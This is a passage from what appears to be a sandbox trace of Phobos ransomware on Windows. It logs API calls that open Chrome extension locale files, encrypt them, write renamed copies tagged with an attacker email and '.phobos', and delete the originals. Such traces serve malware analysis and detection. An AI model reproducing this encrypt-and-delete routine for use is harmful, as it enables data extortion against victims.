nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.688] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.688] CloseHandle (hObject=0x130) returned 1 [0154.688] CloseHandle (hObject=0x14c) returned 1 [0154.689] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json")) returned 1 [0154.689] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.690] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=251) returned 1 [0154.690] CloseHandle (hObject=0x14c) returned 1 [0154.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json")) returned 0x2020 [0154.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.690] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.690] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.691] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.691] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfb, lpOverlapped=0x0) returned 1 [0154.691] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0154.691] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0154.692] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.692] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.692] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.692] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.692] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.692] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.692] CloseHandle (hObject=0x14c) returned 1 [0154.692] CloseHandle (hObject=0x130) returned 1 [0154.693] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json")) returned 1 [0154.693] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.694] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=357) returned 1 [0154.694] CloseHandle (hObject=0x130) returned 1 [0154.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json")) returned 0x2020 [0154.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.695] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.695] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.695] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.695] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.695] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x165, lpOverlapped=0x0) returned 1 [0154.696] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0154.696] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0154.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.697] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.697] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.697] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.697] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.697] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.697] CloseHandle (hObject=0x130) returned 1 [0154.697] CloseHandle (hObject=0x14c) returned 1 [0154.697] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json")) returned 1 [0154.698] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.698] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=607) returned 1 [0154.698] CloseHandle (hObject=0x14c) returned 1 [0154.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json")) returned 0x2020 [0154.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.699] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.699] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.699] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.699] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.699] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x25f, lpOverlapped=0x0) returned 1 [0154.844] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x260, dwBufLen=0x260 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x260) returned 1 [0154.844] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x260, lpOverlapped=0x0) returned 1 [0154.844] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.844] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.844] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.844] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.844] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.845] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.845] CloseHandle (hObject=0x14c) returned 1 [0154.845] CloseHandle (hObject=0x130) returned 1 [0154.845] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json")) returned 1 [0154.846] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.846] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=451) returned 1 [0154.846] CloseHandle (hObject=0x130) returned 1 [0154.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json")) returned 0x2020 [0154.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.846] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.846] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.847] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.847] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c3, lpOverlapped=0x0) returned 1 [0154.849] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0) returned 1 [0154.849] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1d0, lpOverlapped=0x0) returned 1 [0154.850] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.850] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.850] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.850] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.850] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.850] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.850] CloseHandle (hObject=0x130) returned 1 [0154.850] CloseHandle (hObject=0x14c) returned 1 [0154.850] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json")) returned 1 [0154.852] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.853] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=300) returned 1 [0154.853] CloseHandle (hObject=0x14c) returned 1 [0154.853] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 